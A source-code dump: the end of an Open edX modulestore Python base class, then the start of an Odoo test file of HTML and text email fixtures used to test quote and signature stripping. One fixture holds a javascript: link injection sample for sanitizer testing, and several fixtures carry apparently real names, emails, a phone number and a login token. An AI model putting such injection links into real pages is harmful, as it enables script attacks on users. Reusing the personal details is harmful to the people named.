# check that item is present and raise the promised exceptions if needed
# pylint: disable=fixme
# TODO (vshnayder): post-launch, make errors properties of items
# self.get_item(location)
assert(isinstance(course_key, CourseKey))
return self._course_errors[course_key].errors
def get_errored_courses(self):
"""
Returns an empty dict.
It is up to subclasses to extend this method if the concept
of errored courses makes sense for their implementation.
"""
return {}
def get_course(self, course_id, depth=0, **kwargs):
"""
See ModuleStoreRead.get_course
Default impl--linear search through course list
"""
assert(isinstance(course_id, CourseKey))
for course in self.get_courses(**kwargs):
if course.id == course_id:
return course
return None
def has_course(self, course_id, ignore_case=False, **kwargs):
"""
Returns the course_id of the course if it was found, else None
Args:
course_id (CourseKey):
ignore_case (boolean): some modulestores are case-insensitive. Use this flag
to search for whether a potentially conflicting course exists in that case.
"""
# linear search through list
assert(isinstance(course_id, CourseKey))
if ignore_case:
return next(
(
c.id for c in self.get_courses()
if c.id.org.lower() == course_id.org.lower() and
c.id.course.lower() == course_id.course.lower() and
c.id.run.lower() == course_id.run.lower()
),
None
)
else:
return next(
(c.id for c in self.get_courses() if c.id == course_id),
None
)
def has_published_version(self, xblock):
"""
Returns True since this is a read-only store.
"""
return True
def heartbeat(self):
"""
Is this modulestore ready?
"""
# default is to say yes by not raising an exception
return {'default_impl': True}
def close_connections(self):
"""
Closes any open connections to the underlying databases
"""
if self.contentstore:
self.contentstore.close_connections()
super(ModuleStoreReadBase, self).close_connections()
@contextmanager
def default_store(self, store_type):
"""
A context manager for temporarily changing the default store
"""
if self.get_modulestore_type(None) != store_type:
raise ValueError(u"Cannot set default store to type {}".format(store_type))
yield
@staticmethod
def memoize_request_cache(func):
"""
Memoize a function call results on the request_cache if there's one. Creates the cache key by
joining the unicode of all the args with &; so, if your arg may use the default &, it may
have false hits
"""
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
"""
Wraps a method to memoize results.
"""
if self.request_cache:
cache_key = '&'.join([hashvalue(arg) for arg in args])
if cache_key in self.request_cache.data.setdefault(func.__name__, {}):
return self.request_cache.data[func.__name__][cache_key]
result = func(self, *args, **kwargs)
self.request_cache.data[func.__name__][cache_key] = result
return result
else:
return func(self, *args, **kwargs)
return wrapper
def hashvalue(arg):
"""
If arg is an xblock, use its location. otherwise just turn it into a string
"""
if isinstance(arg, XBlock):
return unicode(arg.location)
else:
return unicode(arg)
# pylint: disable=abstract-method
class ModuleStoreWriteBase(ModuleStoreReadBase, ModuleStoreWrite):
'''
Implement interface functionality that can be shared.
'''
def __init__(self, contentstore, **kwargs):
super(ModuleStoreWriteBase, self).__init__(contentstore=contentstore, **kwargs)
self.mixologist = Mixologist(self.xblock_mixins)
def partition_fields_by_scope(self, category, fields):
"""
Return dictionary of {scope: {field1: val, ..}..} for the fields of this potential xblock
:param category: the xblock category
:param fields: the dictionary of {fieldname: value}
"""
result = collections.defaultdict(dict)
if fields is None:
return result
cls = self.mixologist.mix(XBlock.load_class(category, select=prefer_xmodules))
for field_name, value in fields.iteritems():
field = getattr(cls, field_name)
result[field.scope][field_name] = value
return result
def create_course(self, org, course, run, user_id, fields=None, runtime=None, **kwargs):
"""
Creates any necessary other things for the course as a side effect and doesn't return
anything useful. The real subclass should call this before it returns the course.
"""
# clone a default 'about' overview module as well
about_location = self.make_course_key(org, course, run).make_usage_key('about', 'overview')
about_descriptor = XBlock.load_class('about')
overview_template = about_descriptor.get_template('overview.yaml')
self.create_item(
user_id,
about_location.course_key,
about_location.block_type,
block_id=about_location.block_id,
definition_data={'data': overview_template.get('data')},
metadata=overview_template.get('metadata'),
runtime=runtime,
continue_version=True,
)
def clone_course(self, source_course_id, dest_course_id, user_id, fields=None, **kwargs):
"""
This base method just copies the assets. The lower level impls must do the actual cloning of
content.
"""
with self.bulk_operations(dest_course_id):
# copy the assets
if self.contentstore:
self.contentstore.copy_all_course_assets(source_course_id, dest_course_id)
return dest_course_id
def delete_course(self, course_key, user_id, **kwargs):
"""
This base method just deletes the assets. The lower level impls must do the actual deleting of
content.
"""
# delete the assets
if self.contentstore:
self.contentstore.delete_all_course_assets(course_key)
super(ModuleStoreWriteBase, self).delete_course(course_key, user_id)
def _drop_database(self):
"""
A destructive operation to drop the underlying database and close all connections.
Intended to be used by test code for cleanup.
"""
if self.contentstore:
self.contentstore._drop_database() # pylint: disable=protected-access
super(ModuleStoreWriteBase, self)._drop_database() # pylint: disable=protected-access
def create_child(self, user_id, parent_usage_key, block_type, block_id=None, fields=None, **kwargs):
"""
Creates and saves a new xblock that as a child of the specified block
Returns the newly created item.
Args:
user_id: ID of the user creating and saving the xmodule
parent_usage_key: a :class:`~opaque_key.edx.UsageKey` identifing the
block that this item should be parented under
block_type: The type of block to create
block_id: a unique identifier for the new item. If not supplied,
a new identifier will be generated
fields (dict): A dictionary specifying initial values for some or all fields
in the newly created block
"""
item = self.create_item(user_id, parent_usage_key.course_key, block_type, block_id=block_id, fields=fields, **kwargs)
parent = self.get_item(parent_usage_key)
parent.children.append(item.location)
self.update_item(parent, user_id)
def _flag_publish_event(self, course_key):
"""
Wrapper around calls to fire the course_published signal
Unless we're nested in an active bulk operation, this simply fires the signal
otherwise a publish will be signalled at the end of the bulk operation
Arguments:
course_key - course_key to which the signal applies
"""
signal_handler = getattr(self, 'signal_handler', None)
if signal_handler:
bulk_record = self._get_bulk_ops_record(course_key) if isinstance(self, BulkOperationsMixin) else None
if bulk_record and bulk_record.active:
bulk_record.has_publish_item = True
else:
signal_handler.send("course_published", course_key=course_key)
def _flag_library_updated_event(self, library_key):
"""
Wrapper around calls to fire the library_updated signal
Unless we're nested in an active bulk operation, this simply fires the signal
otherwise a publish will be signalled at the end of the bulk operation
Arguments:
library_updated - library_updated to which the signal applies
"""
signal_handler = getattr(self, 'signal_handler', None)
if signal_handler:
bulk_record = self._get_bulk_ops_record(library_key) if isinstance(self, BulkOperationsMixin) else None
if bulk_record and bulk_record.active:
bulk_record.has_library_updated_item = True
else:
signal_handler.send("library_updated", library_key=library_key)
def only_xmodules(identifier, entry_points):
"""Only use entry_points that are supplied by the xmodule package"""
from_xmodule = [entry_point for entry_point in entry_points if entry_point.dist.key == 'xmodule']
return default_select(identifier, from_xmodule)
def prefer_xmodules(identifier, entry_points):
"""Prefer entry_points from the xmodule package"""
from_xmodule = [entry_point for entry_point in entry_points if entry_point.dist.key == 'xmodule']
if from_xmodule:
return default_select(identifier, from_xmodule)
else:
return default_select(identifier, entry_points)
class EdxJSONEncoder(json.JSONEncoder):
"""
Custom JSONEncoder that handles `Location` and `datetime.datetime` objects.
`Location`s are encoded as their url string form, and `datetime`s as
ISO date strings
"""
def default(self, obj):
if isinstance(obj, (CourseKey, UsageKey)):
return unicode(obj)
elif isinstance(obj, datetime.datetime):
if obj.tzinfo is not None:
if obj.utcoffset() is None:
return obj.isoformat() + 'Z'
else:
return obj.isoformat()
else:
return obj.isoformat()
else:
return super(EdxJSONEncoder, self).default(obj)
| agpl-3.0 |
SAM-IT-SA/odoo | openerp/addons/base/tests/test_mail_examples.py | 302 | 57129 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
MISC_HTML_SOURCE = """
<font size="2" style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; ">test1</font>
<div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; font-size: 12px; font-style: normal; ">
<b>test2</b></div><div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; font-size: 12px; ">
<i>test3</i></div><div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; font-size: 12px; ">
<u>test4</u></div><div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; font-size: 12px; ">
<strike>test5</strike></div><div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; ">
<font size="5">test6</font></div><div><ul><li><font color="#1f1f1f" face="monospace" size="2">test7</font></li><li>
<font color="#1f1f1f" face="monospace" size="2">test8</font></li></ul><div><ol><li><font color="#1f1f1f" face="monospace" size="2">test9</font>
</li><li><font color="#1f1f1f" face="monospace" size="2">test10</font></li></ol></div></div>
<blockquote style="margin: 0 0 0 40px; border: none; padding: 0px;"><div><div><div><font color="#1f1f1f" face="monospace" size="2">
test11</font></div></div></div></blockquote><blockquote style="margin: 0 0 0 40px; border: none; padding: 0px;">
<blockquote style="margin: 0 0 0 40px; border: none; padding: 0px;"><div><font color="#1f1f1f" face="monospace" size="2">
test12</font></div><div><font color="#1f1f1f" face="monospace" size="2"><br></font></div></blockquote></blockquote>
<font color="#1f1f1f" face="monospace" size="2"><a href="http://google.com">google</a></font>
<a href="javascript:alert('malicious code')">test link</a>
"""
EDI_LIKE_HTML_SOURCE = """<div style="font-family: 'Lucica Grande', Ubuntu, Arial, Verdana, sans-serif; font-size: 12px; color: rgb(34, 34, 34); background-color: #FFF; ">
<p>Hello ${object.partner_id.name},</p>
<p>A new invoice is available for you: </p>
<p style="border-left: 1px solid #8e0000; margin-left: 30px;">
<strong>REFERENCES</strong><br />
Invoice number: <strong>${object.number}</strong><br />
Invoice total: <strong>${object.amount_total} ${object.currency_id.name}</strong><br />
Invoice date: ${object.date_invoice}<br />
Order reference: ${object.origin}<br />
Your contact: <a href="mailto:${object.user_id.email or ''}?subject=Invoice%20${object.number}">${object.user_id.name}</a>
</p>
<br/>
<p>It is also possible to directly pay with Paypal:</p>
<a style="margin-left: 120px;" href="${object.paypal_url}">
<img class="oe_edi_paypal_button" src="https://www.paypal.com/en_US/i/btn/btn_paynowCC_LG.gif"/>
</a>
<br/>
<p>If you have any question, do not hesitate to contact us.</p>
<p>Thank you for choosing ${object.company_id.name or 'us'}!</p>
<br/>
<br/>
<div style="width: 375px; margin: 0px; padding: 0px; background-color: #8E0000; border-top-left-radius: 5px 5px; border-top-right-radius: 5px 5px; background-repeat: repeat no-repeat;">
<h3 style="margin: 0px; padding: 2px 14px; font-size: 12px; color: #DDD;">
<strong style="text-transform:uppercase;">${object.company_id.name}</strong></h3>
</div>
<div style="width: 347px; margin: 0px; padding: 5px 14px; line-height: 16px; background-color: #F2F2F2;">
<span style="color: #222; margin-bottom: 5px; display: block; ">
${object.company_id.street}<br/>
${object.company_id.street2}<br/>
${object.company_id.zip} ${object.company_id.city}<br/>
${object.company_id.state_id and ('%s, ' % object.company_id.state_id.name) or ''} ${object.company_id.country_id.name or ''}<br/>
</span>
<div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; ">
Phone: ${object.company_id.phone}
</div>
<div>
Web : <a href="${object.company_id.website}">${object.company_id.website}</a>
</div>
</div>
</div></body></html>"""
OERP_WEBSITE_HTML_1 = """
<div>
<div class="container">
<div class="row">
<div class="col-md-12 text-center mt16 mb16" data-snippet-id="colmd">
<h2>OpenERP HR Features</h2>
<h3 class="text-muted">Manage your company most important asset: People</h3>
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-rounded img-responsive" src="/website/static/src/img/china_thumb.jpg">
<h4 class="mt16">Streamline Recruitments</h4>
<p>Post job offers and keep track of each application received. Follow applicants in your recruitment process with the smart kanban view.</p>
<p>Save time by automating some communications with email templates. Resumes are indexed automatically, allowing you to easily find for specific profiles.</p>
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-rounded img-responsive" src="/website/static/src/img/desert_thumb.jpg">
<h4 class="mt16">Enterprise Social Network</h4>
<p>Break down information silos. Share knowledge and best practices amongst all employees. Follow specific people or documents and join groups of interests to share expertise and documents.</p>
<p>Interact with your collegues in real time with live chat.</p>
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-rounded img-responsive" src="/website/static/src/img/deers_thumb.jpg">
<h4 class="mt16">Leaves Management</h4>
<p>Keep track of the vacation days accrued by each employee. Employees enter their requests (paid holidays, sick leave, etc), for managers to approve and validate. It's all done in just a few clicks. The agenda of each employee is updated accordingly.</p>
</div>
</div>
</div>
</div>"""
OERP_WEBSITE_HTML_1_IN = [
'Manage your company most important asset: People',
'img class="img-rounded img-responsive" src="/website/static/src/img/china_thumb.jpg"',
]
OERP_WEBSITE_HTML_1_OUT = [
'Break down information silos.',
'Keep track of the vacation days accrued by each employee',
'img class="img-rounded img-responsive" src="/website/static/src/img/deers_thumb.jpg',
]
OERP_WEBSITE_HTML_2 = """
<div class="mt16 cke_widget_editable cke_widget_element oe_editable oe_dirty" data-oe-model="blog.post" data-oe-id="6" data-oe-field="content" data-oe-type="html" data-oe-translate="0" data-oe-expression="blog_post.content" data-cke-widget-data="{}" data-cke-widget-keep-attr="0" data-widget="oeref" contenteditable="true" data-cke-widget-editable="text">
<section class="mt16 mb16" data-snippet-id="text-block">
<div class="container">
<div class="row">
<div class="col-md-12 text-center mt16 mb32" data-snippet-id="colmd">
<h2>
OpenERP Project Management
</h2>
<h3 class="text-muted">Infinitely flexible. Incredibly easy to use.</h3>
</div>
<div class="col-md-12 mb16 mt16" data-snippet-id="colmd">
<p>
OpenERP's <b>collaborative and realtime</b> project
management helps your team get work done. Keep
track of everything, from the big picture to the
minute details, from the customer contract to the
billing.
</p><p>
Organize projects around <b>your own processes</b>. Work
on tasks and issues using the kanban view, schedule
tasks using the gantt chart and control deadlines
in the calendar view. Every project may have it's
own stages allowing teams to optimize their job.
</p>
</div>
</div>
</div>
</section>
<section class="" data-snippet-id="image-text">
<div class="container">
<div class="row">
<div class="col-md-6 mt16 mb16" data-snippet-id="colmd">
<img class="img-responsive shadow" src="/website/static/src/img/image_text.jpg">
</div>
<div class="col-md-6 mt32" data-snippet-id="colmd">
<h3>Manage Your Shops</h3>
<p>
OpenERP's Point of Sale introduces a super clean
interface with no installation required that runs
online and offline on modern hardwares.
</p><p>
It's full integration with the company inventory
and accounting, gives you real time statistics and
consolidations amongst all shops without the hassle
of integrating several applications.
</p>
</div>
</div>
</div>
</section>
<section class="" data-snippet-id="text-image">
<div class="container">
<div class="row">
<div class="col-md-6 mt32" data-snippet-id="colmd">
<h3>Enterprise Social Network</h3>
<p>
Make every employee feel more connected and engaged
with twitter-like features for your own company. Follow
people, share best practices, 'like' top ideas, etc.
</p><p>
Connect with experts, follow what interests you, share
documents and promote best practices with OpenERP
Social application. Get work done with effective
collaboration across departments, geographies
and business applications.
</p>
</div>
<div class="col-md-6 mt16 mb16" data-snippet-id="colmd">
<img class="img-responsive shadow" src="/website/static/src/img/text_image.png">
</div>
</div>
</div>
</section><section class="" data-snippet-id="portfolio">
<div class="container">
<div class="row">
<div class="col-md-12 text-center mt16 mb32" data-snippet-id="colmd">
<h2>Our Porfolio</h2>
<h4 class="text-muted">More than 500 successful projects</h4>
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/deers.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/desert.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/china.jpg">
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/desert.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/china.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/deers.jpg">
</div>
<div class="col-md-4" data-snippet-id="colmd">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/landscape.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/china.jpg">
<img class="img-thumbnail img-responsive" src="/website/static/src/img/desert.jpg">
</div>
</div>
</div>
</section>
</div>
"""
OERP_WEBSITE_HTML_2_IN = [
'management helps your team get work done',
]
OERP_WEBSITE_HTML_2_OUT = [
'Make every employee feel more connected',
'img class="img-responsive shadow" src="/website/static/src/img/text_image.png',
]
TEXT_1 = """I contact you about our meeting tomorrow. Here is the schedule I propose:
9 AM: brainstorming about our new amazing business app
9.45 AM: summary
10 AM: meeting with Ignasse to present our app
Is everything ok for you ?
--
MySignature"""
TEXT_1_IN = ["""I contact you about our meeting tomorrow. Here is the schedule I propose:
9 AM: brainstorming about our new amazing business app
9.45 AM: summary
10 AM: meeting with Ignasse to present our app
Is everything ok for you ?"""]
TEXT_1_OUT = ["""--
MySignature"""]
TEXT_2 = """Salut Raoul!
Le 28 oct. 2012 à 00:02, Raoul Grosbedon a écrit :
> I contact you about our meeting tomorrow. Here is the schedule I propose: (quote)
Of course. This seems viable.
> 2012/10/27 Bert Tartopoils :
>> blahblahblah (quote)?
>>
>> blahblahblah (quote)
>>
>> Bert TARTOPOILS
>> bert.tartopoils@miam.miam
>>
>
>
> --
> RaoulSignature
Bert TARTOPOILS
bert.tartopoils@miam.miam
"""
TEXT_2_IN = ["Salut Raoul!", "Of course. This seems viable."]
TEXT_2_OUT = ["I contact you about our meeting tomorrow. Here is the schedule I propose: (quote)",
"""> 2012/10/27 Bert Tartopoils :
>> blahblahblah (quote)?
>>
>> blahblahblah (quote)
>>
>> Bert TARTOPOILS
>> bert.tartopoils@miam.miam
>>
>
>
> --
> RaoulSignature"""]
HTML_1 = """<p>I contact you about our meeting for tomorrow. Here is the schedule I propose: (keep)
9 AM: brainstorming about our new amazing business app
9.45 AM: summary
10 AM: meeting with Ignasse to present our app
Is everything ok for you ?
--
MySignature</p>"""
HTML_1_IN = ["""I contact you about our meeting for tomorrow. Here is the schedule I propose: (keep)
9 AM: brainstorming about our new amazing business app
9.45 AM: summary
10 AM: meeting with Ignasse to present our app
Is everything ok for you ?"""]
HTML_1_OUT = ["""--
MySignature"""]
HTML_2 = """<div>
<font><span>I contact you about our meeting for tomorrow. Here is the schedule I propose:</span></font>
</div>
<div>
<ul>
<li><span>9 AM: brainstorming about our new amazing business app</span></li>
<li><span>9.45 AM: summary</span></li>
<li><span>10 AM: meeting with Fabien to present our app</span></li>
</ul>
</div>
<div>
<font><span>Is everything ok for you ?</span></font>
</div>"""
HTML_2_IN = ["<font><span>I contact you about our meeting for tomorrow. Here is the schedule I propose:</span></font>",
"<li><span>9 AM: brainstorming about our new amazing business app</span></li>",
"<li><span>9.45 AM: summary</span></li>",
"<li><span>10 AM: meeting with Fabien to present our app</span></li>",
"<font><span>Is everything ok for you ?</span></font>"]
HTML_2_OUT = []
HTML_3 = """<div><pre>This is an answer.
Regards,
XXXXXX
----- Mail original -----</pre>
<pre>Hi,
My CRM-related question.
Regards,
XXXX</pre></div>"""
HTML_3_IN = ["""<div><pre>This is an answer.
Regards,
XXXXXX
----- Mail original -----</pre>"""]
HTML_3_OUT = ["Hi,", "My CRM-related question.",
"Regards,"]
HTML_4 = """
<div>
<div>Hi Nicholas,</div>
<br>
<div>I'm free now. 00447710085916.</div>
<br>
<div>Regards,</div>
<div>Nicholas</div>
<br>
<span id="OLK_SRC_BODY_SECTION">
<div style="font-family:Calibri; font-size:11pt; text-align:left; color:black; BORDER-BOTTOM: medium none; BORDER-LEFT: medium none; PADDING-BOTTOM: 0in; PADDING-LEFT: 0in; PADDING-RIGHT: 0in; BORDER-TOP: #b5c4df 1pt solid; BORDER-RIGHT: medium none; PADDING-TOP: 3pt">
<span style="font-weight:bold">From: </span>OpenERP Enterprise <<a href="mailto:sales@openerp.com">sales@openerp.com</a>><br><span style="font-weight:bold">Reply-To: </span><<a href="mailto:sales@openerp.com">sales@openerp.com</a>><br><span style="font-weight:bold">Date: </span>Wed, 17 Apr 2013 13:30:47 +0000<br><span style="font-weight:bold">To: </span>Microsoft Office User <<a href="mailto:n.saxlund@babydino.com">n.saxlund@babydino.com</a>><br><span style="font-weight:bold">Subject: </span>Re: your OpenERP.com registration<br>
</div>
<br>
<div>
<p>Hello Nicholas Saxlund, </p>
<p>I noticed you recently registered to our OpenERP Online solution. </p>
<p>You indicated that you wish to use OpenERP in your own company. We would like to know more about your your business needs and requirements, and see how we can help you. When would you be available to discuss your project ?
</p>
<p>Best regards, </p>
<pre><a href="http://openerp.com">http://openerp.com</a>
Belgium: +32.81.81.37.00
U.S.: +1 (650) 307-6736
India: +91 (79) 40 500 100
</pre>
</div>
</span>
</div>"""
HTML_5 = """<div><pre>Hi,
I have downloaded OpenERP installer 7.0 and successfully installed the postgresql server and the OpenERP.
I created a database and started to install module by log in as administrator.
However, I was not able to install any module due to "OpenERP Server Error" as shown in the attachement.
Could you please let me know how could I fix this problem?
Regards,
Goh Sin Yih
________________________________
From: OpenERP Enterprise <sales@openerp.com>
To: sinyih_goh@yahoo.com
Sent: Friday, February 8, 2013 12:46 AM
Subject: Feedback From Your OpenERP Trial
Hello Goh Sin Yih,
Thank you for having tested OpenERP Online.
I noticed you started a trial of OpenERP Online (gsy) but you did not decide to keep using it.
So, I just wanted to get in touch with you to get your feedback. Can you tell me what kind of application you were you looking for and why you didn't decide to continue with OpenERP?
Thanks in advance for providing your feedback,
Do not hesitate to contact me if you have any questions,
Thanks,
</pre>"""
GMAIL_1 = """Hello,<div><br></div><div>Ok for me. I am replying directly in gmail, without signature.</div><div><br></div><div>Kind regards,</div><div><br></div><div>Demo.<br><br><div>On Thu, Nov 8, 2012 at 5:29 PM, <span><<a href="mailto:dummy@example.com">dummy@example.com</a>></span> wrote:<br><blockquote><div>I contact you about our meeting for tomorrow. Here is the schedule I propose:</div><div><ul><li>9 AM: brainstorming about our new amazing business app</span></li></li>
<li>9.45 AM: summary</li><li>10 AM: meeting with Fabien to present our app</li></ul></div><div>Is everything ok for you ?</div>
<div><p>--<br>Administrator</p></div>
<div><p>Log in our portal at: <a href="http://localhost:8069#action=login&db=mail_1&login=demo">http://localhost:8069#action=login&db=mail_1&login=demo</a></p></div>
</blockquote></div><br></div>"""
GMAIL_1_IN = ['Ok for me. I am replying directly in gmail, without signature.']
GMAIL_1_OUT = ['Administrator', 'Log in our portal at:']
THUNDERBIRD_1 = """<div>On 11/08/2012 05:29 PM,
<a href="mailto:dummy@example.com">dummy@example.com</a> wrote:<br></div>
<blockquote>
<div>I contact you about our meeting for tomorrow. Here is the
schedule I propose:</div>
<div>
<ul><li>9 AM: brainstorming about our new amazing business
app</span></li></li>
<li>9.45 AM: summary</li>
<li>10 AM: meeting with Fabien to present our app</li>
</ul></div>
<div>Is everything ok for you ?</div>
<div>
<p>--<br>
Administrator</p>
</div>
<div>
<p>Log in our portal at:
<a href="http://localhost:8069#action=login&db=mail_1&token=rHdWcUART5PhEnJRaXjH">http://localhost:8069#action=login&db=mail_1&token=rHdWcUART5PhEnJRaXjH</a></p>
</div>
</blockquote>
Ok for me. I am replying directly below your mail, using Thunderbird, with a signature.<br><br>
Did you receive my email about my new laptop, by the way ?<br><br>
Raoul.<br><pre>--
Raoul Grosbedonnée
</pre>"""
THUNDERBIRD_1_IN = ['Ok for me. I am replying directly below your mail, using Thunderbird, with a signature.']
THUNDERBIRD_1_OUT = ['I contact you about our meeting for tomorrow.', 'Raoul Grosbedon']
HOTMAIL_1 = """<div>
<div dir="ltr"><br>
I have an amazing company, i'm learning OpenERP, it is a small company yet, but plannig to grow up quickly.
<br> <br>Kindest regards,<br>xxx<br>
<div>
<div id="SkyDrivePlaceholder">
</div>
<hr id="stopSpelling">
Subject: Re: your OpenERP.com registration<br>From: xxx@xxx.xxx<br>To: xxx@xxx.xxx<br>Date: Wed, 27 Mar 2013 17:12:12 +0000
<br><br>
Hello xxx,
<br>
I noticed you recently created an OpenERP.com account to access OpenERP Apps.
<br>
You indicated that you wish to use OpenERP in your own company.
We would like to know more about your your business needs and requirements, and see how
we can help you. When would you be available to discuss your project ?<br>
Best regards,<br>
<pre>
<a href="http://openerp.com" target="_blank">http://openerp.com</a>
Belgium: +32.81.81.37.00
U.S.: +1 (650) 307-6736
India: +91 (79) 40 500 100
</pre>
</div>
</div>
</div>"""
HOTMAIL_1_IN = ["I have an amazing company, i'm learning OpenERP, it is a small company yet, but plannig to grow up quickly."]
HOTMAIL_1_OUT = ["Subject: Re: your OpenERP.com registration", " I noticed you recently created an OpenERP.com account to access OpenERP Apps.",
"We would like to know more about your your business needs and requirements", "Belgium: +32.81.81.37.00"]
MSOFFICE_1 = """
<div>
<div class="WordSection1">
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
Our requirements are simple. Just looking to replace some spreadsheets for tracking quotes and possibly using the timecard module.
We are a company of 25 engineers providing product design services to clients.
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
I’ll install on a windows server and run a very limited trial to see how it works.
If we adopt OpenERP we will probably move to Linux or look for a hosted SaaS option.
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
<br>
I am also evaluating Adempiere and maybe others.
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span>
</p>
<p> </p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
I expect the trial will take 2-3 months as this is not a high priority for us.
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span>
</p>
<p> </p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
Alan
</span>
</p>
<p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span>
</p>
<p> </p>
<p></p>
<div>
<div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0in 0in 0in">
<p class="MsoNormal">
<b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">
From:
</span></b>
<span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">
OpenERP Enterprise [mailto:sales@openerp.com]
<br><b>Sent:</b> Monday, 11 March, 2013 14:47<br><b>To:</b> Alan Widmer<br><b>Subject:</b> Re: your OpenERP.com registration
</span>
</p>
<p></p>
<p></p>
</div>
</div>
<p class="MsoNormal"></p>
<p> </p>
<p>Hello Alan Widmer, </p>
<p></p>
<p>I noticed you recently downloaded OpenERP. </p>
<p></p>
<p>
Uou mentioned you wish to use OpenERP in your own company. Please let me more about your
business needs and requirements? When will you be available to discuss about your project?
</p>
<p></p>
<p>Thanks for your interest in OpenERP, </p>
<p></p>
<p>Feel free to contact me if you have any questions, </p>
<p></p>
<p>Looking forward to hear from you soon. </p>
<p></p>
<pre><p> </p></pre>
<pre>--<p></p></pre>
<pre>Nicolas<p></p></pre>
<pre><a href="http://openerp.com">http://openerp.com</a><p></p></pre>
<pre>Belgium: +32.81.81.37.00<p></p></pre>
<pre>U.S.: +1 (650) 307-6736<p></p></pre>
<pre>India: +91 (79) 40 500 100<p></p></pre>
<pre> <p></p></pre>
</div>
</div>"""
MSOFFICE_1_IN = ['Our requirements are simple. Just looking to replace some spreadsheets for tracking quotes and possibly using the timecard module.']
MSOFFICE_1_OUT = ['I noticed you recently downloaded OpenERP.', 'Uou mentioned you wish to use OpenERP in your own company.', 'Belgium: +32.81.81.37.00']
MSOFFICE_2 = """
<div>
<div class="WordSection1">
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Nicolas,</span></p><p></p>
<p></p>
<p class="MsoNormal" style="text-indent:.5in">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">We are currently investigating the possibility of moving away from our current ERP </span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Thank You</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Matt</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<div>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Raoul Petitpoil</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Poil Industries</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Information Technology</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">920 Super Street</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Sanchez, Pa 17046 USA</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Tel: xxx.xxx</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Fax: xxx.xxx</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Email: </span>
<a href="mailto:raoul@petitpoil.com">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:blue">raoul@petitpoil.com</span>
</a>
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">www.poilindustries.com</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">www.superproducts.com</span></p><p></p>
<p></p>
</div>
<p class="MsoNormal">
